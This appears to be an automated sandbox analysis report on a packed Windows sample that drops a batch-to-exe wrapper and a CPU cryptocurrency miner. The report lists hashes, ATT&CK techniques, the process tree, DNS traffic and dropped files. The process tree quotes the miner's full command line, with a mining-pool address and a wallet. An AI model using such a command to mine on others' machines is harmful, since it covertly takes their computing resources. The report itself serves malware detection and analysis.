73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21/02/2024, 11:03 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3144	b2e.exe
408	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
408	cpuminer-sse2.exe
408	cpuminer-sse2.exe
408	cpuminer-sse2.exe
408	cpuminer-sse2.exe
408	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2396-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2396 wrote to memory of 3144	2396	batexe.exe	81
PID 2396 wrote to memory of 3144	2396	batexe.exe	81
PID 2396 wrote to memory of 3144	2396	batexe.exe	81
PID 3144 wrote to memory of 2840	3144	b2e.exe	82
PID 3144 wrote to memory of 2840	3144	b2e.exe	82
PID 3144 wrote to memory of 2840	3144	b2e.exe	82
PID 2840 wrote to memory of 408	2840	cmd.exe	85
PID 2840 wrote to memory of 408	2840	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Users\Admin\AppData\Local\Temp\F6C4.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\F6C4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\F6C4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6B2.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:408

Network

DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

187.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.178.17.96.in-addr.arpa

IN PTR

Response

187.178.17.96.in-addr.arpa

IN PTR

a96-17-178-187deploystaticakamaitechnologiescom
DNS

148.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.177.190.20.in-addr.arpa

IN PTR

Response
DNS

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

Remote address:

8.8.8.8:53

Request

yespower.sea.mine.zpool.ca

IN A

Response

yespower.sea.mine.zpool.ca

IN A

198.50.168.213
DNS

213.168.50.198.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.168.50.198.in-addr.arpa

IN PTR

Response

213.168.50.198.in-addr.arpa

IN PTR

minezpoolca
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

0.204.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.204.248.87.in-addr.arpa

IN PTR

Response

0.204.248.87.in-addr.arpa

IN PTR

https-87-248-204-0lhrllnwnet
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR

Response

194.178.17.96.in-addr.arpa

IN PTR

a96-17-178-194deploystaticakamaitechnologiescom
DNS

24.73.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.73.42.20.in-addr.arpa

IN PTR

Response

10.127.0.1:12000

46 B
40 B
1
1
198.50.168.213:6234

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

7.8kB
10.0kB
82
85
127.0.0.1:56584

cpuminer-sse2.exe
127.0.0.1:56586

cpuminer-sse2.exe

8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

187.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

187.178.17.96.in-addr.arpa
8.8.8.8:53

148.177.190.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

148.177.190.20.in-addr.arpa
8.8.8.8:53

yespower.sea.mine.zpool.ca

dns

cpuminer-sse2.exe

72 B
88 B
1
1

DNS Request

yespower.sea.mine.zpool.ca

DNS Response

198.50.168.213
8.8.8.8:53

213.168.50.198.in-addr.arpa

dns

73 B
100 B
1
1

DNS Request

213.168.50.198.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

146 B
147 B
2
1

DNS Request

133.211.185.52.in-addr.arpa

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

0.204.248.87.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

0.204.248.87.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

194.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

194.178.17.96.in-addr.arpa
8.8.8.8:53

24.73.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

24.73.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6B2.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\F6C4.tmp\b2e.exe

Filesize
16.6MB

MD5
9de61f48c21f874ea249c146d5fce829

SHA1
0c833e8c39974f96ec00de5a22ad6eb5fc3c895b

SHA256
2d42ada7f124a614b3f8e068ddd3af9d73c7bd51a5f2a49fe88e164f34a78f67

SHA512
e0c8bf5c8992062db9025487381a33352ca7864218271b71ac70cccd8460bd17cbb7f49e64e386e776fe4d339d527b9e696096794c1d4693057d715748178aca

Download Submit
C:\Users\Admin\AppData\Local\Temp\F6C4.tmp\b2e.exe

Filesize
3.8MB

MD5
612c00f5d416ec2c7673054b8ea1f15a

SHA1
2d621e6f889d9cfca2b54c4a4b947a9587386ae3

SHA256
8e013f8e3fa4a68b053e569ee811ebcb1abae27db4363bd8cd3452ec93b091c2

SHA512
d36ed4975652a73b2b24b2b79cadb2f0c7b35e9a6ca8adaae47a79d8c7e126c42bab382429451cc95d21277da08c01dba63e9a929a86a8b1281beb018c125596

Download Submit
C:\Users\Admin\AppData\Local\Temp\F6C4.tmp\b2e.exe

Filesize
3.3MB

MD5
c4c55a89214623f19f890d7fd6f3b97e

SHA1
564e0cedbaa2d3f7e689d6202d6d7bd43b0cfe2e

SHA256
cd21b720fd4a2fcbf32143920db484ae01685254585f1c1fa380e0b9a40c68c2

SHA512
a5c67bead28383d7f9553ef0f513de80fc351f6704d89269babb329a0b0ac12dcd29602442995254d11280010066fae4b4dc891b8e32e84a638db9a8c7decf4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
348KB

MD5
136561f865fb01ac2a9261bf108d0e4b

SHA1
634bc06b3d94ad4f518b0f5c4047c21186ffe885

SHA256
9f20b3165f6e9fc5dc7ad062e84a1d39f11e5dfafad2b7fc9460aa9b46d65002

SHA512
066cd4b3ea7a9c4ae37d49aa38835362ac9aa4f05116eb9a5d6ad23eb211955b5c1af2b0ffe5279971d7cc38e2d276177cdd62f15265dd3a4027a96d209f6831

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
362KB

MD5
290909b1a3b0ce513f748d5b6ccb59eb

SHA1
a487c508d83a843346354f7e7e55440bc2df869c

SHA256
f266c5148514ae4e365600622bb404fc9fcd8aa615cf5f854765d3fd1ae5a84b

SHA512
4517e81c0f0c9fcb53455d8e447c7e5919b27c46970b4da9bd2b6a7f2cef58e84a556f3f42cad3b5b2fd58c34bd1ea050b6200b5b6de251883cd5c6285c64f49

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
399KB

MD5
90c3ac41e3136e0842db9302af8247da

SHA1
b81fa45c438bda91c4ce76955d2c31047c245e64

SHA256
473077203df2da328f1ac6425b07b94fb7ef281f954ae129640f23bf02882598

SHA512
d70882a720480bc6173be3cc191cfc25e66481882093b88b8fcb72ba847d8689d13f54f7eff3b357f2edf2acf35f9df5630bd1203ef3e55db210af275502d291

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
469KB

MD5
429e4b1d1245a336ee461f96c327c9ea

SHA1
8609667f1c8007c0fd8ba7c03edf805ba68b570d

SHA256
0a408698867b0037d63b7f194ded78be87ad023b23947e77f5c5fb08631eb5ff

SHA512
28dc4355044776577b231d3b0b23b2257dcba4da8a32a06508e2478923b8c890fb5b11fe2d9c6ee7347dcc797cc055a08e57cbf77f8195fc40c8307440dd0495

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
257KB

MD5
7958539858c99d6dde4ff8868fb89d95

SHA1
02b9e82db4e4954619c32c1f45324a9cc01efc3b

SHA256
65d035c1b25a1b72319251664111d813160b2078cc9aa4d4b306dfac04d57a13

SHA512
c0832178cc274c57ecf6db669911a58d34a765e39b7f1396d5ba02f03b78841d227a56b6aa46f5d842451143927bd30310926695f01fdb5b68c16a29e90d65b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
288KB

MD5
6f6d0c6c329f59fc847caccecc85307d

SHA1
fb5bffadbd679612d7347b42ab5f33b404a3b8b2

SHA256
4adda1f53a2352dde08a8e1821d8c1d5b5144c4244d51c81ae48f144c56a5b03

SHA512
dc01149cbde4a28eb07518b21720b5d7ffc3cc34e7fa5debae5851d3e78d109552ef04e045997c92edbe85b417fbd865871558bfe00b01cb6d4130220c0c1d2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
328KB

MD5
80616336d3cc7cbe0ac3adfab7e89891

SHA1
60d0301f3bc873c9328eb4bcc5a3323bd48cba86

SHA256
bc2ed278a34b9c05c9ce3317bff3edda7b91a22469f5f0c3a2e061bf25a30767

SHA512
992c86c329f7ed66b5f98cad0aca52600cf2ea116b4b1c3a05502e620fa11bb46dbe17258929aaa00477ddccbd3c8ad8925eb8d2922a6ef2ff37d4059c9a3632

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
294KB

MD5
6d4efd377b4cc8fd20765162145e7784

SHA1
f4d83bfb7b151f9e4c92aae0645ad1ff56b1f893

SHA256
b99a25b17b7d7f621344b00a23dba98af9f2b3f6699b85daf3e8a6b0a687b874

SHA512
5147ec571a882705c7617ad9e198df6cef60bd4cc7f559129c0fa0a309e970eb6ea1f240447dd4a0424c9539a548dc3335cec23ea482353b8de67f331be6ab5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
394KB

MD5
1bededfcade62e9dd6c6d85c7ee5af57

SHA1
9f4bad8255f85d9fd2959af10e0d150cec0ab61d

SHA256
f0c6a54ba019986cdc8bebfc9975011f219a317e9c3ad56926b88d548bd70482

SHA512
3d4d6cb2433c2dc778db5d873d5f8abe8f71b9fbe1b4c9048306bf8d0ccdf3babb23615b6f22be4ddc20a74770c6aa1155dccc4406fe37561af456e80d74e56d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
473KB

MD5
107ea7945299229abc1af4876e902a2c

SHA1
eb4dec5c27182d1a320372a414aad69c5542328d

SHA256
204aa6c24568daefdd16c79044557a2e969c54ccc78aa5cdab8b8f4b0b97476d

SHA512
ea9d266ee4b811ad12860f499dab193cc688ff4e49331d369de49809518e391a1af787645fd10dda3621c0c1e400d02f4470f26c90a2380ca94e4e70fc0599e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
285KB

MD5
5dea9f641adb33192d5ba40ffc761dc3

SHA1
9b7a04ed2d295f5d8468c451b2550f392ba64938

SHA256
47f5823affa1461ff7f370f5e0340124f8a5036eae91e169d8574cdb0cce5f93

SHA512
26585f01ab7f097272edcfdb192f7943d504ca2510812e9c7b360412f43969cd3bc39303b3d3a4e5237bff2840d3bc04c2360a935515b46f0e923e77e876eb9c

Download Submit
memory/408-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/408-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/408-46-0x00000000635D0000-0x0000000063668000-memory.dmp

Filesize
608KB

Download
memory/408-47-0x0000000001070000-0x0000000002925000-memory.dmp

Filesize
24.7MB

Download
memory/408-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/408-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2396-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3144-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3144-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.